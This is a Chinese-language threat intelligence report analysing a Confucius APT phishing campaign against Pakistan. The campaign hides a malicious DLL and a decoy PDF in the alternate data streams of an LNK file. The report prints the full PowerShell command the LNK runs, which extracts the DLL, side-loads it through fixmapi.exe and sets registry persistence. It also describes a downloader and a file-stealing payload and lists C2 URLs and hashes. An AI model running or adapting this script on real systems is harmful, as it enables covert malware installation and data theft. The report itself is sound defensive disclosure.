查看原文
其他

Confucius组织利用ADS隐藏技术的攻击活动分析

高级威胁研究院 360威胁情报中心
2024-11-05
Confucius

Confucius 组织,又被称“魔罗桫”该组织自2013年开始活跃,攻击行动主要目的是获取敏感信息。

我们在日常威胁狩猎中观察到该组织的持续活动,主要针对巴基斯坦地区进行攻击,并使用了ADS(Alternate Data Streams)特性来隐藏恶意文件,这种技术在之前该组织的攻击活动中未出现过。鉴于此,我们重点披露该组织使用ADS加载恶意组件的整个流程,以便用户及时发现,避免中招。

 一、攻击活动分析  

1.攻击流程分析  

Confucius组织首先针对目标人群发送钓鱼邮件,并且携带恶意压缩包,其中压缩包中包括一个存在多个数据流的LNK文件,攻击者利用ADS交换数据流实现了恶意DLL和诱饵文档的隐藏,用户解压压缩包,看不到隐藏的DLL等文件,只能看到LNK文件,并且文件大小也只是LNK文件大小本身,但是当用户点击其中LNK文件即中招,LNK文件会释放隐藏的诱饵文档流数据,并释放DLL文件以及拷贝fixmapi.exe实现侧加载,并通过注册表实现持久化驻留。整个流程如下图所示:    

2.恶意载荷分析  

攻击入口为一个压缩包,文件名称为“Hajj_Advisory.rar”。

MD5

fbcac2eb16586813275d2e25ec57142e

文件名称

Hajj_Advisory.rar

文件大小

131.71 KB (134871 字节)

解压后可以看到一个同名称的lnk文件,文件大小只有4KB。
但是实际上攻击者利用ADS交换数据流技术在LNK文件中捆绑了两个数据流Banana和Apple,这两个数据流分别是恶意DLL和诱饵文档,不过这两个文件流不显示,即使系统设置显示隐藏文件,解压后也看不到该文件流。通过在CMD中执行dir /r命令,可以看到,如下图所示:    
另外虽然LNK文件大小显示只有4KB,但是仔细观察发现该文件占用空间为188KB,也侧面看出该LNK携带了恶意文件流数据。

解压后的LNK文件基本信息如下:

MD5

fc81c75276fb21ccebb3ab6a4aac2239

文件名称

Hajj_Advisory.pdf.lnk

文件大小

3.04 KB (3113 字节)

Hajj_Advisory.pdf.lnk是一个LNK文件,该LNK文件一旦运行会执行以下PowerShell脚本,该脚本的目的是查找“Hajj_Advisory.pdf.lnk”文件,然后分别读取名为“Apple”和“Banana”的交换数据流。接着将其Apple数据流写入mapistub.dll文件中,将Banana数据流写入file.pdf,并复制“C:\Windows\System32\fixmapi.exe”到mapistub.dll同级目录并命名为“BlueApple.exe”实现侧加载。最后将“BlueApple.exe”添加到“HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows”实现持久化。    

"$abc = Get-ChildItem -Path $env:TMP -Recurse -Name 'Hajj_Advisory.pdf.lnk' -Depth 1;if ($null -eq $abc) { $abc = Get-ChildItem -Path .\ -Recurse -Name 'Hajj_Advisory.pdf.lnk' -Depth 1;$ab = Join-Path -Path $(pwd).path -ChildPath $abc} else {$ab = Join-Path -Path $env:TMP -ChildPath $abc};$asx = Get-Content -Path $ab -Stream Apple -Raw; $ctor = 'C:\Program Files\Ava' + 'st So' + 'ftware'; if (-Not (Test-Path -Path $ctor)) { $pa = $env:LocalAppData} else {$pa = 'C:\ProgramData'}; Set-Content -Path (Join-Path -Path $pa -ChildPath '\mapistub.dll') -Value $asx -NoNewline;$asy = Get-Content -Path $ab -Stream Banana -Raw;Set-Content -Path (Join-Path -Path $env:TMP -ChildPath '\file.pdf') -Value $asy -NoNewline;$abz = $env:TMP + '\file.pdf'; start $abz; $c = Join-Path -Path $pa -ChildPath '\BlueApple.exe';Copy-Item -Path C:\Windows\System32\fixmapi.exe -Destination $c;REG ADD 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' /v load /f /d $c;if (-Not (Test-Path -Path $ctor)) {start $c}"

Hajj_Advisory.pdf.lnk:Banana实际上是个PDF文件,该文件是巴基斯坦宗教事务和宗教间和谐部关于增加朝圣预算的说明文件。

 

mapistub.dll(Hajj_Advisory.pdf.lnk:Apple,md5为e0802b79ad53e9b8251034255d759b90)是一个C#编写的第一阶段下载器,该程序一旦被加载,就会分别从https[:]//coldchikenshop29.info/NroWSNCK83.tut或者https[:]//greenearthtreeh.info/UcoBeA.tut处远程下载并内存加载下一阶段载荷。这两个远程下载链接是同一个文件。

下载的文件基本信息如下:

MD5

0474c1ff499c5d6a25f4f1893cfbc5a5

文件名称

ClassLibrary1.dll

文件大小

18.0 KB (18,432 字节)

ClassLibrary1.dll是mapistub.dll从远端下载并在内存加载而来,该文件是一个C#编写的文件窃取木马。   

ClassLibrary1.dll一旦被加载,首先获取C盘的设备ID,机器名(machineName),用户名(userName),进行拼接。形成“http[:]//whitemissycorp.info/User_Hash/[设备ID]__[machineName]__[username].txt”的URL,读取该URL的内容,并按照32位进行分割填充,该内容是用户文件Hash。用于判断后续特定文件是否已经上传。
然后计算C:\Users\[username]\路径下OneDrive,Documents,Downloads,Desktop,Pictures,Videos,Music目录下的指定后缀的文件Hash,并和之前远程读取的文件Hash进行比较。判断文件是否上传。
该攻击载荷会搜集以下后缀的文件。    
zip,rar,eml,txt,TXT,pdf,PDF,png,PNG,jpg,JPG,DOC,doc,XLS,xlm,XLM,xls,odp,ODP,ods,ODS,odt,ODT,rtf,RTF,ppt,PPT,xlsx,XLSX,xlsm,XLSM,docx,DOCX,pptx,PPTX,docm,DOCM,jpeg,JPEG
除此以外,该攻击载荷还会收集除C盘以外其他可用磁盘的数据,并且收集除了特定目录以外的文件夹的文件。
如果文件Hash并不存在,说明并未上传文件,则将文件通过 “http[:]//whitemissycorp.info/HprodXprnvlm1.php”上传,并将机器名,用户名,文件Hash等信息通过“http[:]//whitemissycorp.info/VueWsxpogcjwq1.php”进行上传,以避免重复上传。

 二、归属研判  

通过对样本整体分析,我们发现本次攻击行动与该组织之前使用LNK文件释放的最终载荷类似。

1.本次攻击使用了ADS交换数据流用来隐藏文件,但是和之前的攻击行动类似,都是使用白加黑组件,并且都使用了fixmapi.exe进行侧加载;

2.本次攻击使用的第一层加载器与之前类似,只是本次攻击存在两个远程链接,之前只有一个下一层载荷链接,这里避免了单一链接出现访问错误的情况。此外本次攻击使用的加载器以及最终下载的载荷都添加了大量无用代码,增加了分析的难度,如下图所示;

3.本次攻击最终载荷增加了文件收集的范围,之前只是收集C:\Users\[username]\下制定文件夹下的文件,本次攻击除了收集这部分文件以外,还收集了其他盘符下的文件,以及C盘的除特定文件夹以外的文件。

个加载过程、样本载荷并结合攻击目标等信息来看,都与Confucius组织完全吻合。


附录 IOC

MD5:

fbcac2eb16586813275d2e25ec57142e

fc81c75276fb21ccebb3ab6a4aac2239

e0802b79ad53e9b8251034255d759b90

0474c1ff499c5d6a25f4f1893cfbc5a5

C2:

http[:]//whitemissycorp.info/VueWsxpogcjwq1.php

http[:]//whitemissycorp.info/HprodXprnvlm1.php

https[:]//coldchikenshop29.info/NroWSNCK83.tut

https[:]//greenearthtreeh.info/UcoBeA.tut



团队介绍
TEAM INTRODUCTION
360高级威胁研究院360高级威胁研究院是360政企安全集团的核心能力支持部门,由360资深安全专家组成,专注于高级威胁的发现、防御、处置和研究,曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击,独家披露多个国家级APT组织的高级行动,赢得业内外的广泛认可,为360保障国家网络安全提供有力支撑。
继续滑动看下一个
360威胁情报中心
向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存